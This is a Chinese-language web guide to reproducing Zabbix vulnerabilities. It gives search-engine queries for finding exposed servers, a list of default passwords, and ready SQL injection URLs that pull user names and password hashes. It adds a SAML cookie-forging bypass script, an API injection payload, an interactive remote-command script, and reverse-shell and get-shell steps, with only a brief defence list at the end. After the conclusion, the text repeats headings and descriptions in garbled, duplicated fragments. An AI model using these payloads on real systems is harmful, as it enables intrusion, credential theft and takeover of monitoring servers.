Zabbix漏洞复现与防御指南<\/h1>

1. Zabbix简介<\/h2>
Zabbix是一款由Alexei Vladishev开发的网络监视、管理系统，基于Server-Client架构。它可用于监视各种网络服务、服务器和网络机器等状态，具有开源、安装简单等特点，被广泛使用。<\/p>

主要组件<\/h3>

Zabbix Server<\/strong>：核心组件，负责接收监控数据、处理、存储和触发告警<\/li>
Zabbix Agent<\/strong>：可选组件，部署在被监控主机上收集数据<\/li>

Zabbix Web<\/strong>：基于PHP的Web界面，用于展示监控数据和配置<\/li> <\/ul>
官网地址：https:\/\/www.zabbix.com\/cn<\/p>
2. Zabbix资产识别<\/h2>
FOFA搜索语法<\/h3>
icon_hash="1045955894" app="ZABBIX-监控系统" title="appliance: Zabbix" title="Zabbix" || icon_hash="1045955894" || app="ZABBIX-监控系统" || title="Zabbix" <\/code><\/pre> Hunter搜索语法<\/h3> app.name="Zabbix" web.icon=="0fbe700fd7d07ec8d30ef8b3ac261484" web.title="appliance: Zabbix" app.name="Zabbix" || web.icon=="0fbe700fd7d07ec8d30ef8b3ac261484" || web.title="appliance: Zabbix" <\/code><\/pre> 3. 常见弱口令<\/h2> Zabbix安装后自带Admin管理员用户和Guests访客用户(低版本)，常见弱口令组合：<\/p> admin\/zabbix Admin\/zabbix Guest\/空密码 guest\/空密码 admin\/123456 zabbix\/zabbix zabbix\/123456 root\/zabbix root\/zabbix123 root\/zabbix1234 root\/zabbix12345 root\/zabbix123456 zabbix\/zabbix123 zabbix\/zabbix1234 zabbix\/zabbix12345 zabbix\/zabbix123456 <\/code><\/pre> 4. Zabbix SQL注入漏洞(CVE-2016-10134)<\/h2> 漏洞描述<\/h3> Zabbix的web模块由PHP编写，存在SQL注入漏洞，攻击者可通过构造恶意请求获取数据库信息。<\/p> 影响版本<\/h3> Zabbix 2.2.x系列：所有低于2.2.15的版本<\/li> Zabbix 3.0.x系列：所有低于3.0.3的版本<\/li> <\/ul> 环境搭建<\/h3> 使用vulhub环境：<\/p> docker-compose up -d <\/span><\/span><\/code><\/pre>漏洞复现步骤<\/h3> 访问http:\/\/your-ip:8080\/index.php<\/code>，使用guest账户(密码为空)登录<\/li> 查看Cookie中的zbx_sessionid<\/code>，复制后16位字符<\/li> 构造payload：<\/li> <\/ol> http:\/\/target:port\/latest.php?output=ajax&sid=[复制的16位字符]&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0) <\/code><\/pre> 也可以通过jsrpc.php<\/code>触发，无需登录：<\/li> <\/ol> http:\/\/target:port\/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&amptimestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2%273297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 <\/code><\/pre> 获取用户名和密码hash：<\/li> <\/ol> 获取用户名： http:\/\/target:port\/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&amptimestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,name,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17 获取密码hash： http:\/\/target:port\/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&amptimestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17 <\/code><\/pre> 5. Zabbix命令注入(CVE-2017-2824)\/代码执行(CVE-2020-11800)<\/h2> 漏洞描述<\/h3> Zabbix Server 2.4.X的陷阱命令功能中存在可利用的代码执行漏洞，攻击者可以从活动的Zabbix代理发出请求来触发此漏洞。<\/p> 漏洞复现步骤<\/h3> 使用弱口令Admin\/zabbix登录后台<\/li> 进入Configuration->Actions，将Event source调整为Auto registration<\/li> 点击Create action创建一个Action<\/li> 在Operation标签页，创建一个type为"Add Host"的Operation<\/li> 下载利用脚本：<\/li> <\/ol> git clone https:\/\/github.com\/listenquiet\/cve-2017-2824-reverse-shell <\/span><\/span><\/code><\/pre> 修改exp.py中的目标IP和端口<\/li> 在服务器上开启监听<\/li> 执行脚本：<\/li> <\/ol> python exp.py target_ip <\/span><\/span><\/code><\/pre>6. Zabbix SAML身份绕过漏洞(CVE-2022-23131)<\/h2> 漏洞描述<\/h3> 在启用SAML SSO身份验证(非默认)的情况下，未经身份验证的攻击者可以通过修改Cookie数据，绕过身份认证获得对Zabbix前端的管理员访问权限。<\/p> 影响版本<\/h3> Zabbix 4.0.36<\/li> Zabbix 5.4.0<\/li> Zabbix 5.4.8<\/li> Zabbix 6.0.0alpha1<\/li> <\/ul> 漏洞复现步骤<\/h3> 访问目标Zabbix地址<\/li> 点击"Sign in with Single Sign-On (SAML)"<\/li> 获取Set-Cookie中的zbx_session值<\/li> 对zbx_session值进行URL解码和Base64解码<\/li> 在解码后的JSON中添加：<\/li> <\/ol> "saml_data"<\/span>:<\/span>{"username_attribute"<\/span>:"Admin"<\/span>, <\/span><\/span><\/code><\/pre> 重新Base64编码和URL编码构造Payload<\/li> 在HTTP请求头中添加构造的Payload，请求index_sso.php<\/li> <\/ol> Python检测脚本<\/h3> import<\/span> requests <\/span><\/span>import<\/span> re,<\/span>base64,<\/span>urllib.parse,<\/span>json <\/span><\/span> <\/span><\/span>def<\/span> runPoc<\/span>(url): <\/span><\/span> response =<\/span> requests.<\/span>get(url,verify=<\/span>False<\/span>) <\/span><\/span> cookie =<\/span> response.<\/span>headers.<\/span>get("Set-Cookie"<\/span>) <\/span><\/span> sessionReg =<\/span> re.<\/span>compile("zbx_session=(.*?);"<\/span>) <\/span><\/span> try<\/span>: <\/span><\/span> session =<\/span> re.<\/span>findall(sessionReg,cookie)[0<\/span>] <\/span><\/span> base64_decode =<\/span> base64.<\/span>b64decode(urllib.<\/span>parse.<\/span>unquote(session,encoding=<\/span>"utf-8"<\/span>)) <\/span><\/span> session_json =<\/span> json.<\/span>loads(base64_decode) <\/span><\/span> payload =<\/span> '{"saml_data":{"username_attribute":"Admin"},"sessionid":"<\/span>%s<\/span>","sign":"<\/span>%s<\/span>"}'<\/span>%<\/span>(session_json["sessionid"<\/span>],session_json["sign"<\/span>]) <\/span><\/span> payload_encode =<\/span> urllib.<\/span>parse.<\/span>quote(base64.<\/span>b64encode(payload.<\/span>encode())) <\/span><\/span> print("加密后Payload:"<\/span> +<\/span> payload_encode) <\/span><\/span> except<\/span> IndexError<\/span>: <\/span><\/span> print("[-] 不存在漏洞"<\/span>) <\/span><\/span> <\/span><\/span>url =<\/span> "http:\/\/target:port\/"<\/span> <\/span><\/span>runPoc(url) <\/span><\/span><\/code><\/pre>7. Zabbix SQL注入漏洞(CVE-2024-42327)<\/h2> 漏洞描述<\/h3> Zabbix的addRelatedObjects函数中的CUser类中存在SQL注入，具有API访问权限的用户可利用造成越权访问高权限用户敏感信息以及执行恶意SQL语句。<\/p> 影响版本<\/h3> 6.0.0 <= Zabbix <= 6.0.31<\/li> 6.4.0 <= Zabbix <= 6.4.16<\/li> Zabbix 7.0.0<\/li> <\/ul> 漏洞利用Payload<\/h3> POST<\/span> \/api_jsonrpc.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target<\/span> <\/span><\/span>Content-Type:<\/span> application\/json-rpc<\/span> <\/span><\/span>Cookie:<\/span> zbx_session=eyJzZXNzaW9uaWQ...<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "jsonrpc": "2.0", <\/span><\/span> "method": "user.get", <\/span><\/span> "params": { <\/span><\/span> "selectRole": [ <\/span><\/span> "a from (select 1 as userid) as u join (select (select user()) as a) as r #" <\/span><\/span> ] <\/span><\/span> }, <\/span><\/span> "id": 2 <\/span><\/span>} <\/span><\/span><\/code><\/pre>8. Zabbix-Server SQL注入漏洞(CVE-2024-22120)<\/h2> 漏洞描述<\/h3> 攻击者在登陆后可构造恶意请求利用clientip参数造成SQL注入。需要低权限用户具有"Detect operating system"权限(默认管理员用户组才有)。<\/p> 漏洞利用步骤<\/h3> 使用脚本提取管理员session_id和session_key<\/li> 利用获取到的session_id构造zbx_session登录管理界面<\/li> 使用RCE脚本执行命令<\/li> <\/ol> RCE脚本示例<\/h3> import<\/span> requests <\/span><\/span>import<\/span> json <\/span><\/span> <\/span><\/span>ZABIX_ROOT =<\/span> "http:\/\/target"<\/span> <\/span><\/span>url =<\/span> ZABIX_ROOT +<\/span> "\/api_jsonrpc.php"<\/span> <\/span><\/span>host_id =<\/span> "10084"<\/span> <\/span><\/span>session_id =<\/span> "获取到的session_id"<\/span> <\/span><\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "content-type"<\/span>: "application\/json"<\/span>, <\/span><\/span>} <\/span><\/span> <\/span><\/span>auth =<\/span> json.<\/span>loads('{"jsonrpc": "2.0", "result": "'<\/span> +<\/span> session_id +<\/span> '", "id": 0}'<\/span>) <\/span><\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> cmd =<\/span> input('>>: '<\/span>) <\/span><\/span> if<\/span> cmd ==<\/span> "quit"<\/span>: <\/span><\/span> break<\/span> <\/span><\/span> <\/span><\/span> payload =<\/span> { <\/span><\/span> "jsonrpc"<\/span>: "2.0"<\/span>, <\/span><\/span> "method"<\/span>: "script.update"<\/span>, <\/span><\/span> "params"<\/span>: { <\/span><\/span> "scriptid"<\/span>: "1"<\/span>, <\/span><\/span> "command"<\/span>: ""<\/span> +<\/span> cmd +<\/span> ""<\/span> <\/span><\/span> }, <\/span><\/span> "auth"<\/span>: auth['result'<\/span>], <\/span><\/span> "id"<\/span>: 0<\/span>, <\/span><\/span> } <\/span><\/span> <\/span><\/span> cmd_upd =<\/span> requests.<\/span>post(url, data=<\/span>json.<\/span>dumps(payload), headers=<\/span>headers) <\/span><\/span> <\/span><\/span> payload =<\/span> { <\/span><\/span> "jsonrpc"<\/span>: "2.0"<\/span>, <\/span><\/span> "method"<\/span>: "script.execute"<\/span>, <\/span><\/span> "params"<\/span>: { <\/span><\/span> "scriptid"<\/span>: "1"<\/span>, <\/span><\/span> "hostid"<\/span>: ""<\/span> +<\/span> host_id +<\/span> ""<\/span> <\/span><\/span> }, <\/span><\/span> "auth"<\/span>: auth['result'<\/span>], <\/span><\/span> "id"<\/span>: 0<\/span>, <\/span><\/span> } <\/span><\/span> <\/span><\/span> cmd_exe =<\/span> requests.<\/span>post(url, data=<\/span>json.<\/span>dumps(payload), headers=<\/span>headers) <\/span><\/span> cmd_exe_json =<\/span> cmd_exe.<\/span>json() <\/span><\/span> <\/span><\/span> if<\/span> "error"<\/span> not<\/span> in<\/span> cmd_exe.<\/span>text: <\/span><\/span> print(cmd_exe_json["result"<\/span>]["value"<\/span>]) <\/span><\/span> else<\/span>: <\/span><\/span> print(cmd_exe_json["error"<\/span>]["data"<\/span>]) <\/span><\/span><\/code><\/pre>9. Zabbix后台Get Shell方法<\/h2> 老版本方法<\/h3> 使用默认用户名密码Admin\/zabbix登录<\/li> 进入管理-脚本<\/li> 创建或修改脚本，写入反弹shell命令<\/li> 点击检测中-最新数据触发执行<\/li> <\/ol> 新版本方法<\/h3> 弱口令进入后台<\/li> 来到管理的脚本处(可能在alert的脚本处)<\/li> 直接写入反弹shell命令执行<\/li> <\/ol> 10. Zabbix(<=4.4)认证绕过<\/h2> 使用Python脚本检测：<\/p> python3 zabbix_auth_bypass.py https:\/\/target:port\/ <\/span><\/span><\/code><\/pre>脚本会自动检测漏洞并生成可利用的链接。<\/p> 11. 漏洞检测工具<\/h2> 使用afrog工具检测Zabbix漏洞：<\/p> afrog.exe -s zabbix -pl # 列出zabbix漏洞列表<\/span> <\/span><\/span>afrog.exe -s zabbix -t http:\/\/xxxxxxx -o xxxx.html # 单目标检测<\/span> <\/span><\/span>afrog.exe -s zabbix -T xxxx.txt -o xxx.html # 批量检测<\/span> <\/span><\/span><\/code><\/pre>12. 防御建议<\/h2> 及时更新Zabbix到最新版本<\/li> 修改默认密码，使用强密码策略<\/li> 限制Zabbix Web界面的访问IP<\/li> 禁用不必要的功能(如自动注册)<\/li> 定期审计Zabbix服务器日志<\/li> 对Zabbix服务器进行网络隔离，限制出站连接<\/li> 实施最小权限原则，限制用户权限<\/li> <\/ol> 通过以上措施，可以有效降低Zabbix系统被攻击的风险。<\/p>

Zabbix漏洞复现与防御指南<\/h1>

1. Zabbix简介<\/h2> Zabbix是一款由Alexei Vladishev开发的网络监视、管理系统，基于Server-Client架构。它可用于监视各种网络服务、服务器和网络机器等状态，具有开源、安装简单等特点，被广泛使用。<\/p>

2. Zabbix资产识别<\/h2>

4. Zabbix SQL注入漏洞(CVE-2016-10134)<\/h2>

漏洞描述<\/h3> Zabbix的web模块由PHP编写，存在SQL注入漏洞，攻击者可通过构造恶意请求获取数据库信息。<\/p>

5. Zabbix命令注入(CVE-2017-2824)\/代码执行(CVE-2020-11800)<\/h2>

漏洞描述<\/h3> Zabbix Server 2.4.X的陷阱命令功能中存在可利用的代码执行漏洞，攻击者可以从活动的Zabbix代理发出请求来触发此漏洞。<\/p>

6. Zabbix SAML身份绕过漏洞(CVE-2022-23131)<\/h2>

漏洞描述<\/h3> 在启用SAML SSO身份验证(非默认)的情况下，未经身份验证的攻击者可以通过修改Cookie数据，绕过身份认证获得对Zabbix前端的管理员访问权限。<\/p>

7. Zabbix SQL注入漏洞(CVE-2024-42327)<\/h2>

漏洞描述<\/h3> Zabbix的addRelatedObjects函数中的CUser类中存在SQL注入，具有API访问权限的用户可利用造成越权访问高权限用户敏感信息以及执行恶意SQL语句。<\/p>

8. Zabbix-Server SQL注入漏洞(CVE-2024-22120)<\/h2>

漏洞描述<\/h3> 攻击者在登陆后可构造恶意请求利用clientip参数造成SQL注入。需要低权限用户具有"Detect operating system"权限(默认管理员用户组才有)。<\/p>

9. Zabbix后台Get Shell方法<\/h2>

1. Zabbix简介<\/h2>
Zabbix是一款由Alexei Vladishev开发的网络监视、管理系统，基于Server-Client架构。它可用于监视各种网络服务、服务器和网络机器等状态，具有开源、安装简单等特点，被广泛使用。<\/p>

漏洞描述<\/h3>
Zabbix的web模块由PHP编写，存在SQL注入漏洞，攻击者可通过构造恶意请求获取数据库信息。<\/p>

漏洞描述<\/h3>
Zabbix Server 2.4.X的陷阱命令功能中存在可利用的代码执行漏洞，攻击者可以从活动的Zabbix代理发出请求来触发此漏洞。<\/p>

漏洞描述<\/h3>
在启用SAML SSO身份验证(非默认)的情况下，未经身份验证的攻击者可以通过修改Cookie数据，绕过身份认证获得对Zabbix前端的管理员访问权限。<\/p>

漏洞描述<\/h3>
Zabbix的addRelatedObjects函数中的CUser类中存在SQL注入，具有API访问权限的用户可利用造成越权访问高权限用户敏感信息以及执行恶意SQL语句。<\/p>

漏洞描述<\/h3>
攻击者在登陆后可构造恶意请求利用clientip参数造成SQL注入。需要低权限用户具有"Detect operating system"权限(默认管理员用户组才有)。<\/p>